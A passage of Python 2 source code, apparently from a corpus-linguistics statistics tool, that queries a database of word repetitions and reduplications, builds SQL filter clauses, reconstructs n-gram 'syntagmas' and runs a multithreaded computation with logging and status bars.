stemmed_search=stemmed_search,additional_pos_where=additional_pos_where))#, splitted_syntagma=splitted_syntagma)
if not where1: return False
#p(where1,"where1_redu", c="b")
_redu = self.get_reps("redu",inp_syntagma_splitted,scope,where1,indexes,thread_name=thread_name, minimum_columns=minimum_columns,
order_output_by_syntagma_order=order_output_by_syntagma_order, return_full_tuple=return_full_tuple,stemmed_search=False,
output_type=output_type,delete_duplicates=delete_duplicates,
syntagma_type=syntagma_type, for_optimization=for_optimization, get_also_non_full_repetativ_result=get_also_non_full_repetativ_result)
#p((repl,_repl, redu, _redu))
if baseline:
if syntagma_type == "lexem":
where2 = tuple(self._get_where_statement(inp_syntagma_splitted,scope=scope,thread_name=thread_name, with_context=False,syntagma_type=syntagma_type, sentiment=sentiment, inp_syntagma_unsplitted=inp_syntagma_unsplitted,stemmed_search=stemmed_search, additional_pos_where=additional_pos_where))#, splitted_syntagma=splitted_syntagma)
if not where2: return False
_baseline = tuple(self._baseline(inp_syntagma_splitted,where=where2,minimum_columns=minimum_columns, thread_name=thread_name))
else:
all_syntagmas = []
if _repl:
all_syntagmas += self._extract_all_syntagmas(_repl, "repl", ordered_output_by_syntagma_order=order_output_by_syntagma_order,minimum_columns=minimum_columns)
if _redu:
all_syntagmas += self._extract_all_syntagmas(_redu, "redu", ordered_output_by_syntagma_order=order_output_by_syntagma_order,minimum_columns=minimum_columns)
#p(all_syntagmas,"all_syntagmas")
for temp_syntagma in set(all_syntagmas):
#p(temp_syntagma, "temp_syntagma")
where2 = tuple(self._get_where_statement(temp_syntagma,scope=scope,thread_name=thread_name, with_context=False,syntagma_type="lexem", sentiment=sentiment,
inp_syntagma_unsplitted=inp_syntagma_unsplitted,stemmed_search=stemmed_search,
additional_pos_where=False))#, splitted_syntagma=splitted_syntagma)
if not where2: return False
_baseline += tuple(self._baseline(temp_syntagma,where=where2, minimum_columns=minimum_columns,thread_name=thread_name))
#p((inp_syntagma_splitted,_repl, _redu, _baseline,))
if not _repl and not _redu and not _baseline:
return {}
if return_full_tuple:
#p((_repl, _redu,_baseline))
if not _repl[0] and not _redu[0] and not _baseline:
return {}
return {"repl":_repl, "redu":_redu, "baseline":_baseline,"syntagma":inp_syntagma_splitted}
def get_reps(self, rep_type,inp_syntagma_splitted,scope,where,indexes,thread_name="Thread0",
order_output_by_syntagma_order=False, return_full_tuple=False, stemmed_search=False,
output_type="list", minimum_columns=False,
delete_duplicates=True, syntagma_type="lexem", for_optimization=False,
get_also_non_full_repetativ_result=False):
#p((rep_type,inp_syntagma_splitted,scope),"get_reps_BEGINN", c="r")
### Step 1: Variables Initialization
_rep = []
is_full_repetativ = True
#if for_optimization:
# col_to_get = "id"
#else:
col_to_get = Stats.min_col[rep_type] if minimum_columns else False
#p((rep_type, inp_syntagma_splitted, get_also_non_full_repetativ_result, for_optimization, scope,where))
# p((where), "where_by_get_reps")
### Step 2:
if order_output_by_syntagma_order:
for word,w in izip(inp_syntagma_splitted,where):
current_reps = tuple(self._rep_getter_from_db(rep_type,inp_syntagma_splitted,scope=scope,where=w,thread_name=thread_name,columns=col_to_get, output_type=output_type, for_optimization=for_optimization))
#if not current_reps:
# return False
#p( current_reps, " current_reps")
# p((current_reps, w))
#for
if current_reps:
if for_optimization: return True # if match, than return True
else:
if for_optimization: continue
is_full_repetativ = False
if self._full_repetativ_syntagma:
if not get_also_non_full_repetativ_result:
_rep = ()
break
_rep.append( (word,current_reps))
if for_optimization: return False # if here, it means, that not one match was found till now.
### Check, if reps in containers are empty
i = 0
for container in _rep:
if not container[1]:
i += 1
if len(_rep) == i:
_rep = ()
else:
for w in where:
#p(w, "w_in_rep", c="c")
#print 1111
current_reps = tuple(self._rep_getter_from_db(rep_type,inp_syntagma_splitted,scope=scope,where=w,thread_name=thread_name,columns=col_to_get, output_type=output_type, for_optimization=for_optimization))
#print "current_reps= ", current_reps
if current_reps:
#print 22222
if for_optimization: return True # if match, than return True
else:
#print 3333
if for_optimization: continue
is_full_repetativ = False
if self._full_repetativ_syntagma:
if not get_also_non_full_repetativ_result:
_rep = ()
break
#print 4444
_rep += current_reps
if for_optimization: return False # if here, it means, that not one match was found till now.
#print 555
if _rep:
## Step 5:
if get_also_non_full_repetativ_result: return _rep
id_ix = indexes[rep_type]["id"]
if self._full_repetativ_syntagma and scope > 1 and is_full_repetativ:
reconstructed,length = self._reconstruct_syntagma(rep_type, _rep, order_output_by_syntagma_order,indexes,syntagma_type=syntagma_type,stemmed_search=stemmed_search)
full_syntagmas, allowed_ids = self._exctract_full_syntagmas(reconstructed,scope,length,inp_syntagma_splitted,syntagma_type=syntagma_type)
_rep = self._filter_full_rep_syn(rep_type,_rep, allowed_ids,order_output_by_syntagma_order ,id_ix) #
if delete_duplicates:
_rep = self._delete_dublicats_in_reps( _rep, order_output_by_syntagma_order,id_ix)
### Step 6:
if return_full_tuple:
try:
full_syn_sum = len(full_syntagmas) if _rep else 0
except:
full_syn_sum = None
if _rep:
return (_rep, is_full_repetativ, full_syn_sum)
else:
_rep
else:
return _rep
def _reconstruct_syntagma(self,rep_type, reps, order_output_by_syntagma_order,indexes,syntagma_type="lexem",stemmed_search=False,):
#p((rep_type, reps, inp_syntagma_splitted, scope,minimum_columns,order_output_by_syntagma_order))
#p(indexes)
reconstr_tree = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda:[None,tuple()])))
#reconstr_tree = defaultdict(lambda: defaultdict(lambda: defaultdict(tuple)))
length = {}
indexes = indexes[rep_type]
word_tag = "stemmed" if stemmed_search else 'normalized_word'
syn_ix = indexes[word_tag] if syntagma_type == "lexem" else indexes['pos']
#p(syn_ix,"syn_ix")
#p(indexes['normalized_word'], "indexes['normalized_word']")
#p(indexes['pos'],"indexes['pos']")
if order_output_by_syntagma_order:
for word, reps_bunch in reps:
#word = reps_container[0]
#reps_bunch = reps_container[1]
for i, rep in enumerate(reps_bunch):
#p((i, rep))
#p(rep[syn_ix])
doc_id = rep[indexes["doc_id"]]
index_in_redufree = json.loads(rep[indexes["index_in_redufree"]])
if doc_id not in length:
length[doc_id] = json.loads(rep[indexes["redufree_len"]])
reconstr_tree[doc_id][index_in_redufree[0]][index_in_redufree[1]][1] += (rep[indexes["id"]],)
if not reconstr_tree[doc_id][index_in_redufree[0]][index_in_redufree[1]][0]:
reconstr_tree[doc_id][index_in_redufree[0]][index_in_redufree[1]][0] = rep[syn_ix]
#+= (rep[indexes["id"]],)
else:
for i,rep in enumerate(reps):
#p((i, rep))
doc_id = rep[indexes["doc_id"]]
index_in_redufree = json.loads(rep[indexes["index_in_redufree"]])
if doc_id not in length:
length[doc_id] = json.loads(rep[indexes["redufree_len"]])
reconstr_tree[doc_id][index_in_redufree[0]][index_in_redufree[1]][1] += (rep[indexes["id"]],)
if not reconstr_tree[doc_id][index_in_redufree[0]][index_in_redufree[1]][0]:
reconstr_tree[doc_id][index_in_redufree[0]][index_in_redufree[1]][0] = rep[syn_ix]
#p({ d:{s:{t:ids for t, ids in s_data.iteritems()} for s, s_data in doc_data.iteritems()} for d, doc_data in reconstr_tree.iteritems()})
return reconstr_tree,length
def _exctract_full_syntagmas(self,reconstr_tree, scope, redu_free_elem_length,inp_syntagma_splitted,syntagma_type="lexem"):
#p((reconstr_tree, scope, redu_free_elem_length,inp_syntagma_splitted,syntagma_type))
try:
#if syntagma_type == "pos":
output_ix = ()
allowed_ids = ()
start_new = False
incr = False
cont = False
orig_first_word = inp_syntagma_splitted[0]
#pos = True if syntagma_type=="pos" else False
for doc_id, doc_data in dict(sorted(reconstr_tree.items())).iteritems():
redu_free_length = [l-1 for l in redu_free_elem_length[doc_id]] # convert length to index
current_syn_ixs = ()
syn_start_word = None
start_tok = None
temp_tok = None
last_token = None
last_sent = None
temp_ids = ()
counter_full_syn = 0
for current_sent, sents_data in dict(sorted(doc_data.items())).iteritems():
for current_tok in sorted(sents_data.keys()):
# p((doc_id,current_sent,current_tok,start_tok, current_syn_ixs),c="m")
if temp_tok:
# print ",,,,,,"
tok_to_use = temp_tok
else:
# print "...."
tok_to_use = start_tok
if not start_tok:
# print "111"
last_token = current_tok
start_tok = (current_sent,current_tok)
start_new = True
counter_full_syn = 1
else:
# print "2222"
# print tok_to_use, counter_full_syn,current_tok
if (tok_to_use[1]+counter_full_syn) == current_tok:
# print "222+++"
counter_full_syn += 1
incr = True
else:#
# print "222---"
#print current_tok, (current_sent,last_sent), (last_token,redu_free_length[last_sent])
if current_tok==0 and ((current_sent-last_sent) == 1) and (last_token==redu_free_length[last_sent]): # if the first token of the next sent build full_syntagma with the last token of the last sent
# print "222!!!"
temp_tok = (current_sent, current_tok)
counter_full_syn = 1
incr = True
else:
# print "222???"
start_new = True
#i = 0
while True:
#i+=1
#if i >3: break
if start_new:
# p("STARTED",c="m")
start_new = False
incr = True
# p(len(current_syn_ixs),"len(current_syn_ixs)")
if len(current_syn_ixs) == scope:
# p("SAVED",c="m")
output_ix += (current_syn_ixs,)
#output_words += ((current_syn_words),)
#output_doc_id += (doc_id,)
allowed_ids += temp_ids
# Clean old vars
current_syn_ixs=()
syn_start_word = sents_data[current_tok][0]
# print orig_first_word, syn_start_word
if orig_first_word not in syn_start_word:
# print "NOT ORIG AS START"
cont = True
break
#syn_start_word = None
temp_ids = ()
temp_tok = None
start_tok = (current_sent,current_tok)
counter_full_syn = 1
# print "+++", counter_full_syn,syn_start_word
if incr:
incr = False
# p("INCR_START",c="m")
# print "!!!!!!!", syn_start_word, sents_data[current_tok]
if syn_start_word:
# p((syn_start_word,sents_data[current_tok][0], counter_full_syn, current_syn_ixs,current_tok,sents_data[current_tok]),c="r")
#if syn_start_word == sents_data[current_tok][0] and counter_full_syn>1 and not pos:
# # p("START NEW",c="m")
# start_new = True
# continue
if len(current_syn_ixs)==scope:
start_new = True
continue
current_syn_ixs += ((current_sent,current_tok),)
curr_rep = sents_data[current_tok]
#current_syn_words += (curr_rep[0],)
#syn_start_word = curr_rep[0]
temp_ids += tuple(curr_rep[1])
# p("INCR_DONE",c="m")
break
if cont:
cont = False
continue
last_token = current_tok
last_sent = current_sent
if len(current_syn_ixs) == scope:
output_ix += (current_syn_ixs,)
allowed_ids += temp_ids
#p((output_ix, set(allowed_ids)))
return output_ix, set(allowed_ids)
except Exception as e:
self.logger.error("Exception was throwed: '{}'.".format(repr(e)) ,exc_info=self._logger_traceback)
return False, False
def _delete_dublicats_in_reps(self,reps,order_output_by_syntagma_order,id_ix):
new_reps = []
used_id = set()
if order_output_by_syntagma_order:
for word, reps in reps[::-1]:
temp_reps = ()
for rep in reps:
rep_id = rep[id_ix]
if rep_id not in used_id:
used_id.add(rep_id)
temp_reps += (rep,)
if temp_reps:
new_reps.append( (word,temp_reps) )
else:
if self._full_repetativ_syntagma:
new_reps = ()
break
else:
new_reps.append( (word,temp_reps) )
new_reps = new_reps[::-1]
else:
#new_reps = ()
for rep in reps:
rep_id = rep[id_ix]
if rep_id not in used_id:
used_id.add(rep_id)
new_reps.append( rep)
return new_reps
def _filter_full_rep_syn(self,rep_type,_rep, allowed_ids,order_output_by_syntagma_order, id_index):
#p((rep_type,_rep, allowed_ids,order_output_by_syntagma_order), c="r")
new_reps = []
if order_output_by_syntagma_order:
for word, reps in _rep:
temp_reps = ()
for rep in reps:
if rep[id_index] in allowed_ids:
temp_reps += (rep,)
if temp_reps:
new_reps.append((word,temp_reps))
else:
new_reps = ()
break
else:
#new_reps = ()
for rep in _rep:
if rep[id_index] in allowed_ids:
new_reps.append(rep)
if not new_reps:
new_reps = ()
#break
return new_reps
def _rep_getter_from_db(self, rep_type,inp_syntagma="*", scope=False,
where=False, output_type="list", size_to_get=1000,
columns=False,thread_name="Thread0",
for_optimization=False,):
if inp_syntagma != "*":
if not where:
self.logger.error("Where wasn't given.")
#yield False
return
try:
table_name = Stats.phenomena_table_map[rep_type]
except:
self.logger.error("Given RepType ('{}') is not exist.".format(rep_type))
#yield False
return
generator = self.statsdb.lazyget(table_name, columns=columns, where=where, connector_where="AND", output=output_type, case_sensitiv=self._case_sensitiv,thread_name=thread_name)
if for_optimization:
try:
next(generator)
yield True
return
except StopIteration:
#pass
return
for row in generator:
yield row
def _extract_all_syntagmas(self, entry, typ, ordered_output_by_syntagma_order=False,minimum_columns=False):
#p(ordered_output_by_syntagma_order, "ordered_output_by_syntagma_order")
all_syntagmas = set()
#p(entry, "entry")
if ordered_output_by_syntagma_order:
for word_container in entry:
for rep in word_container[1]:
done = False
for index in xrange(1, self._avaliable_scope+1):
temp_syntagma = []
for i in xrange(index):
#p(self._get_index_by_codepoint(i, typ), "self._get_index_by_codepoint(i, typ)")
word = rep[self._get_index_by_codepoint(i, typ,minimum_columns)]
#temp_syntagma.append(word)
if word:
temp_syntagma.append(word)
else:
#break
done=True
if done: break
#p(temp_syntagma,"{}temp_syntagma".format(typ))
all_syntagmas.add(tuple(temp_syntagma))
#all_syntagmas.add(temp_syntagma)
if done: break
else:
#p(entry, "entry", c="r")
for rep in entry:
#p(rep,"rep", c="r")
done = False
for index in xrange(1, self._avaliable_scope+1):
temp_syntagma = []
for i in xrange(index):
#p(self._get_index_by_codepoint(i, typ), "self._get_index_by_codepoint(i, typ)")
word = rep[self._get_index_by_codepoint(i, typ,minimum_columns)]
#temp_syntagma.append(word)
#p(word, "word", c="m")
if word:
temp_syntagma.append(word)
else:
#break
done=True
if done: break
#p(temp_syntagma,"{}temp_syntagma".format(typ))
all_syntagmas.add(tuple(temp_syntagma))
#all_syntagmas.add(temp_syntagma)
if done: break
#all_syntagmas.append(temp_syntagma)
#p(all_syntagmas,"set_all_syntagmas")
return all_syntagmas
def _baseline(self, inp_syntagma="*", max_scope=False, where=False, connector_where="AND", output="list", size_to_fetch=1000, thread_name="Thread0", split_syntagma=True,minimum_columns=False ,limit=-1, offset=0):
#temp_cols_to_get = Stats.min_col["baseline"] if minimum_columns else False
#columns = columns if columns else temp_cols_to_get
columns = Stats.min_col["baseline"] if minimum_columns else False
#p((where, inp_syntagma,max_scope))
# p(locals())
if inp_syntagma == "*":
if max_scope is not False:
w = "scope <= {}".format(max_scope)
if where:
if isinstance(where, (list, tuple)):
#answer = None
ix = None
for index, tw in enumerate(where):
if "scope" in tw:
ix = index
if ix:
where[ix] = w
else:
where.append(w)
if connector_where != "AND":
self.logger.error("PossibleWrongData: ConnectorWhere is 'OR' but should be 'AND'")
else:
temp_where = [where]
if "scope" not in where:
temp_where.append(w)
else:
temp_where = [w]
else:
where = w
#baseline_num = len(list(self.statsdb.lazyget("baseline", columns=columns, where=where, connector_where=connector_where, output=output, case_sensitiv=self._case_sensitiv,thread_name=thread_name+"BSGET",limit=limit, offset=offset, size_to_fetch=size_to_fetch)))
# p((where,max_scope,baseline_num), "where")
# print 000
for row in self.statsdb.lazyget("baseline", columns=columns, where=where, connector_where=connector_where, output=output, case_sensitiv=self._case_sensitiv,thread_name=thread_name+"BSGET",limit=limit, offset=offset, size_to_fetch=size_to_fetch):
# p(row, "row")
# print 111
if split_syntagma and row:
# print 222
#temp_row = list(row)
#row = list(row)
splitted_syntagma = row[0].split(self._baseline_delimiter)
#row[0] = splitted_syntagma
r = (splitted_syntagma,) + row[1:]
# p((r, split_syntagma))
yield (splitted_syntagma,) + row[1:]
#yield splitted_syntagma
else:
# p((row, split_syntagma))
yield row
else:
if not where:
self.logger.error("Where wasn't given.")
yield False
return
for row in self.statsdb.lazyget("baseline", columns=columns, where=where, connector_where="AND", output=output, case_sensitiv=self._case_sensitiv,limit=limit, offset=offset):
#p(row, "row")
if split_syntagma and row:
row = list(row)
row[0] = row[0].split(self._baseline_delimiter)
yield row
#sys.exit()
def _get_index_by_codepoint(self, codepoint, typ,minimum_columns):
indexes = self.col_index_min[typ] if minimum_columns else self.col_index_orig[typ]
if codepoint == 0:
return indexes["normalized_word"]
elif codepoint == 1:
return indexes["contextR1"]
else:
return indexes["contextR1"] + (2* (codepoint-1))
def _get_where_statement(self,inp_syntagma_splitted, inp_syntagma_unsplitted=False,
scope=False, syntagma_type="lexem", sentiment=False,thread_name="Thread0",
with_context=True,stemmed_search=False, additional_pos_where=False):#, splitted_syntagma=True):
### Syntagma Preprocessing
#o = type(inp_syntagma_splitted)
#p((inp_syntagma_splitted, o))
status= True
convert = False
if syntagma_type != "pos":
try:
if not inp_syntagma_unsplitted:
try:
inp_syntagma_unsplitted = self._baseline_delimiter.join(inp_syntagma_splitted)
except TypeError:
inp_syntagma_unsplitted = self._baseline_delimiter.join([unicode(syntagma) for syntagma in inp_syntagma_splitted])
except (UnicodeDecodeError, UnicodeEncodeError):
convert = True
while status:
if convert:
#p( inp_syntagma_splitted, "1 inp_syntagma_splitted")
try:
inp_syntagma_splitted = [word.decode("utf-8") for word in inp_syntagma_splitted]
except (UnicodeDecodeError, UnicodeEncodeError):
pass
try:
if inp_syntagma_unsplitted:
try:
inp_syntagma_unsplitted = inp_syntagma_unsplitted.decode("utf-8")
except (UnicodeDecodeError, UnicodeEncodeError):
pass
else:
inp_syntagma_unsplitted = self._baseline_delimiter.join(inp_syntagma_splitted)
#p(repr(inp_syntagma_unsplitted), "inp_syntagma_unsplitted")
except (UnicodeDecodeError, UnicodeEncodeError):
inp_syntagma_unsplitted = self._baseline_delimiter.join([unicode(t) for t in inp_syntagma_splitted])
#p(repr(inp_syntagma_unsplitted), "2 inp_syntagma_unsplitted")
try:
additional_pos_where = [word.decode("utf-8") for word in additional_pos_where]
except:
pass
#p(inp_syntagma_splitted, "inp_syntagma_splitted")
try:
#wheres = []
if with_context: # for repl and redu
if syntagma_type == "lexem":
if stemmed_search:
normalized_word_tag_name = "stemmed"
else:
normalized_word_tag_name = "normalized_word"
else:
normalized_word_tag_name = "pos"
#normalized_word_tag_name = "normalized_word" if syntagma_type == "lexem" else "pos"
if stemmed_search:
context_tag_name_r = "context_infoR"
context_tag_name_l = "context_infoL"
word_index = 2
else:
context_tag_name_r = "contextR" if syntagma_type == "lexem" else "context_infoR"
context_tag_name_l = "contextL" if syntagma_type == "lexem" else "context_infoL"
word_index = 0
# splitted_syntagma = inp_syntagma_splitted if splitted_syntagma else inp_syntagma_splitted.split(self._baseline_delimiter)
# unsplitted_syntagma = inp_syntagma_splitted if splitted_syntagma else inp_syntagma_splitted.split(self._baseline_delimiter)
if scope > self.baseline_ngramm_lenght:
self.logger.error("WhereGetter: Given Scope ('{}') is higher as allow ('{}'). (given syntagma:'{}'). ".format(scope, self.baseline_ngramm_lenght, inp_syntagma_splitted))
#yield False
return
for token_index in xrange(scope):
last_token_index = scope-1
where = []
for i, token in zip(range(scope),inp_syntagma_splitted):
#p(token, "token")
#token = token.replace("'", '"') if "'" in token else token
if i < token_index:
#ix = token_index -1
#json_extract("text", "$[1]")
col_name = u"{}{}".format(context_tag_name_l,token_index-i)
search_pattern = u"{}='{}'".format(col_name,token) if syntagma_type == "lexem" and not stemmed_search else u'json_extract("{}", "$[{}]") = "{}"'.format(col_name,word_index,token)
#search_pattern = u"='{}'".format(token) if syntagma_type == "lexem" else u"LIKE '%{}%'".format(token)
where.append(search_pattern)
if additional_pos_where and syntagma_type!="pos":
col_name = u"{}{}".format("context_infoL",token_index-i)
search_pattern = u'json_extract("{}", "$[0]") = "{}"'.format(col_name,additional_pos_where[i])
where.append(search_pattern)
#where.append(u"{}{} {} ".format(context_tag_name_l,token_index-i,search_pattern))
elif i == token_index:
where.append(u"{}='{}' ".format(normalized_word_tag_name,token))
if additional_pos_where and syntagma_type!="pos":
where.append(u" pos = '{}' ".format(additional_pos_where[i]))
elif i > token_index:
col_name = u"{}{}".format(context_tag_name_r,i-token_index)
search_pattern = u"{}='{}'".format(col_name,token) if syntagma_type == "lexem" and not stemmed_search else u'json_extract("{}", "$[{}]") = "{}"'.format(col_name,word_index,token)
#search_pattern = u"='{}'".format(token) if syntagma_type == "lexem" else u"LIKE '%{}%'".format(token)
where.append(search_pattern)
if additional_pos_where and syntagma_type!="pos":
col_name = u"{}{}".format("context_infoR",i-token_index)
search_pattern = u'json_extract("{}", "$[0]") = "{}"'.format(col_name,additional_pos_where[i])
where.append(search_pattern)
if sentiment:
where.append(u"polarity LIKE '%{}%'".format(sentiment))
yield where
return
else:
if syntagma_type == "pos":
#p((inp_syntagma_splitted, inp_syntagma_unsplitted))
self.logger.error("To get Where Expression without context for SyntagmaType='pos' is not possible. ")
#return False
#yield False
return
syntagma_tag ='stemmed' if stemmed_search else "syntagma"
syntagma_qeary = u"{}= '{}'".format(syntagma_tag,inp_syntagma_unsplitted)
#p([syntagma_qeary], "[syntagma_qeary]")
#return [syntagma_qeary]
yield syntagma_qeary
return
except (UnicodeDecodeError, UnicodeEncodeError):
convert = True
def _is_syntagma_scope_right(self, scope_num):
#self._context_left
#self._context_lenght
if scope_num > self._avaliable_scope:
#self.logger.error("")
return False
else:
return True
def _preprocess_syntagma(self, inp_syntagma,thread_name="Thread0", syntagma_type="lexem",stemmed_search=False):
#p(inp_syntagma,"inp_syntagma")
#p((inp_syntagma), "11")
try:
inp_syntagma = [token.decode("utf-8") for token in inp_syntagma]
except:
pass
#p((inp_syntagma), "22")
if not isinstance(inp_syntagma, (list,tuple)):
self.logger.error("Given inp_syntagma ('{}') is from an un-support type ('{}')".format(inp_syntagma, type(inp_syntagma)))
return False
if syntagma_type == "lexem":
#p((self._case_sensitiv),"self._case_sensitiv")
if not self._case_sensitiv:
inp_syntagma = [token.lower() for token in inp_syntagma]
inp_syntagma = [self.preprocessors[thread_name]["rle"].del_rep(token) for token in inp_syntagma]
#p((inp_syntagma))
if stemmed_search:
inp_syntagma = [self.stemm(word) for word in inp_syntagma]
return inp_syntagma
#p(inp_syntagma,"inp_syntagma")
#if not self._case_sensitiv:
# inp_syntagma = [token.lower() for token in inp_syntagma]
def _check_settings_for_force_cleaning(self):
temp_force_cleaning = False
if self._corp_info["case_sensitiv"] is True and self._case_sensitiv is False:
temp_force_cleaning = True
elif self._corp_info["case_sensitiv"] is False and self._case_sensitiv is True:
self.logger.error("Current CorpDB was lower_cased. And StatdDB was initialized with sensitive case. Because tt is not possible any more to reconstruct the case back, this operation is illegal. Please change setting and try one more time.")
return False
if self._corp_info["del_url"] is False and self._ignore_url is True:
temp_force_cleaning = True
if self._corp_info["del_punkt"] is False and self._ignore_punkt is True:
temp_force_cleaning = True
if self._corp_info["del_num"] is False and self._ignore_num is True:
temp_force_cleaning = True
if self._corp_info["del_mention"] is False and self._ignore_mention is True:
temp_force_cleaning = True
if self._corp_info["del_hashtag"] is False and self._ignore_hashtag is True:
temp_force_cleaning = True
if temp_force_cleaning:
self.statsdb.update_attr("force_cleaning", True)
self.set_all_intern_attributes_from_db()
if self._force_cleaning is not True:
self.logger.error("Force_cleaning-Option wasn't activated.")
return False
else:
self.statsdb.update_attr("force_cleaning", False)
self.set_all_intern_attributes_from_db()
return True
###########################Setters####################
#_drop_created_indexes
def compute(self,inp_corp, stream_number=1, datatyp="dict",
adjust_to_cpu=True,min_files_pro_stream=1000,cpu_percent_to_get=50,
thread_name="Thread0", create_indexes=True, freeze_db=False,
drop_indexes=True,optimized_for_long_syntagmas=True,
baseline_insertion_border=1000000):
if not self._check_stats_db_should_exist():
return False
#p(stream_number, "stream_number")
if not self._check_db_should_be_an_stats():
return False
#self._baseline_intime_insertion_till = baseline_intime_insertion_till
#try:
if not isinstance(inp_corp, Corpus):
self.logger.error("Given InpObject is not from Corpus type. Insert was aborted!")
return False
if self.statsdb.get_attr("locked"):
self.logger.error("Current DB is still be locked. Possibly it in ht now fr in-useom other process or la thest computation process is failed.")
return False
self.statsdb.update_attr("locked", True)
self._init_compution_variables()
if self._db_frozen: ## insert "db_frozen" as attribute to the StatsDB!!!
msg = "Current StatsDB is closed for new Insertions because it was already SizeOptimized and all temporary Data was deleted"
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
self._terminated.value = True
return False
if drop_indexes:
self._drop_created_indexes()
self._init_compution_variables()
self.corp = inp_corp
self._corp_info = self.corp.info()
self._text_field_name = self._corp_info["text_field_name"]
self._id_field_name = self._corp_info["id_field_name"]
self.statsdb.update_attr("pos_tagger",self._corp_info["pos_tagger"])
self.statsdb.update_attr("sentiment_analyzer",self._corp_info["sentiment_analyzer"])
self._pos_tagger = self._corp_info["pos_tagger"]
self._sentiment_analyzer = self._corp_info["sentiment_analyzer"]
self._compute_cleaning_flags()
#p(self.force_cleaning_flags, "self.force_cleaning_flags")
#p(self._force_cleaning, "self._force_cleaning")
if not self._check_settings_for_force_cleaning():
return False
#p(self._force_cleaning, "self._force_cleaning")
if not self._language:
self.statsdb.update_attr("language",self._corp_info["language"])
else:
if self._language != self._corp_info["language"]:
self.logger.error("StatsDB language ('{}') is not equal to the inserting CorpDB ('{}'). Those meta data should be equal for staring the insertion process. Please select other corpus, which you want to insert to the current statsDB or initialize a new StatsDB with right language.".format(self._language, self._corp_info["language"]))
return False
#p(self._corpus_id, "self._corpus_id")
if not self._corpus_id:
self.statsdb.update_attr("corpus_id", self._corp_info["id"])
self.set_all_intern_attributes_from_db()
else:
if self._corpus_id != self._corp_info["id"]:
self.logger.error("Current StatdDb was already computed/initialized for Corpus with id '{}'. Now you try to insert Corpus with id '{}' and it is not allow.".format(self._corpus_id,self._corp_info["id"]))
#p(self._corpus_id, "self._corpus_id")
self._init_stemmer(self._corp_info["language"])
#self.status_bars_manager = self._get_status_bars_manager()
##### Status-Bar - Name of the processed DB
if self._status_bar:
# print "\n"
if self._in_memory:
dbname = ":::IN-MEMORY-DB:::"
else:
dbname = '{}'.format(self.statsdb.fname())
status_bar_starting_corpus_insertion = self._get_new_status_bar(None, self.status_bars_manager.term.center( dbname) , "", counter_format=self.status_bars_manager.term.bold_white_on_blue("{fill}{desc}{fill}"))
status_bar_starting_corpus_insertion.refresh()
if adjust_to_cpu:
stream_number= get_number_of_streams_adjust_cpu( min_files_pro_stream, inp_corp.corpdb.rownum("documents"), stream_number, cpu_percent_to_get=cpu_percent_to_get)
if stream_number is None or stream_number==0:
#p((self._get_number_of_left_over_files(),self.counter_lazy_getted),"self._get_number_of_left_over_files()")
self.logger.error("Number of input files is 0. Not generators could be returned.", exc_info=self._logger_traceback)
return []
streams= self.get_streams_from_corpus(inp_corp, stream_number, datatyp=datatyp)
#p(streams, "streams")
## threads
if self._status_bar:
status_bar_threads_init = self._get_new_status_bar(len(streams), "ThreadsStarted", "threads")
#p((stream_number, len(streams)))
#i=1
self._threads_num = len(streams)
if self._threads_num>1:
if self._status_bar:
unit = "rows"
self.main_status_bar_of_insertions = self._get_new_status_bar(0, "AllThreadsTotalInsertions", unit)
self.main_status_bar_of_insertions.refresh()
#self.main_status_bar_of_insertions.total = 0
else:
self.main_status_bar_of_insertions = False
#parent, child = Pipe()
db_writer_queue = Queue()
db_writer = threading.Thread(target=self._db_multiproc_writer, args=(db_writer_queue, stream_number), name=thread_name)
#db_writer = mp.Process(target=self._db_multiproc_writer, args=(db_writer_queue, stream_number), name=thread_name)
db_writer.setDaemon(True)
db_writer.start()
for stream in streams:
reciever = stream[2]
sender = stream[3]
thread_name = stream[0]
length = stream[1]
status_bar_insertion_in_the_current_thread = self._init_status_bar_for_current_thread( length, thread_name=thread_name, ) if self._status_bar else False
#processThread = threading.Thread(target=self._compute, args=(gen,status_bar_insertion_in_the_current_thread,datatyp, thread_name,baseline_insertion_border), name=thread_name)
#processThread = mp.Process(target=self._compute, args=(reciever,sender,db_writer_queue,status_bar_insertion_in_the_current_thread,datatyp, thread_name,baseline_insertion_border), name=thread_name)
processThread = threading.Thread(target=self._compute, args=(reciever,sender,db_writer_queue,status_bar_insertion_in_the_current_thread,datatyp, thread_name,baseline_insertion_border), name=thread_name)
processThread.daemon = True
processThread.start()
self.active_threads.append(processThread)
if self._status_bar:
status_bar_threads_init.update(incr=1)
#i+=1
time.sleep(1)
self.logger.info("'{}'-thread(s) was started. ".format(len(self.active_threads)))
time.sleep(3)
if not self._wait_till_all_threads_are_completed("Compute"):
return False
self._close_db_writer.value = True
db_writer.join()
#p("+++1111",c="m")
#p(self.statsdb._cashed_dict, "self.statsdb._cashed_dict")
self.statsdb._write_cashed_insertion_to_disc()
self.statsdb._commit(write_all_cash = True)
self.len_active_threads = len(self.active_threads)
del self.active_threads
self.active_threads = []
#db_writer.terminate()
del db_writer
gc.collect()
## save attributes from the main counter
if self._status_bar:
if self.main_status_bar_of_insertions:
self.counters_attrs["compute"]["start"] = self.main_status_bar_of_insertions.start
self.counters_attrs["compute"]["end"] = self.main_status_bar_of_insertions.last_update
self.counters_attrs["compute"]["total"] = self.main_status_bar_of_insertions.total
self.counters_attrs["compute"]["desc"] = self.main_status_bar_of_insertions.desc
else:
self.counters_attrs["compute"] = False
#p("2222",c="m")
#self._print_summary_status()
inserted_repl = self.statsdb.rownum("replications")
inserted_redu = self.statsdb.rownum("reduplications")
uniq_syntagma_in_baseline = self.statsdb.rownum("baseline")
if self._status_bar:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Repl:'{}'; Redu:'{}'; UniqSyntagmaBaseline: '{}'.".format(inserted_repl, inserted_redu,uniq_syntagma_in_baseline ) ), "", counter_format=self.status_bars_manager.term.bold_white_on_blue('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
#print "\n"
if not self._status_bar:
self.logger.info("Current StatsDB has '{}' rows in the Replications Table; '{}' rows in the Reduplications Table;'{}' rows in the Baseline Table; ".format(inserted_repl,inserted_redu,uniq_syntagma_in_baseline))
else:
self.logger.debug("Current StatsDB has '{}' rows in the Replications Table; '{}' rows in the Reduplications Table;'{}' rows in the Baseline Table; ".format(inserted_repl,inserted_redu,uniq_syntagma_in_baseline))
#self.logger.info("Current StatsDB has '{}' rows in the Reduplications Table.".format(inserted_redu))
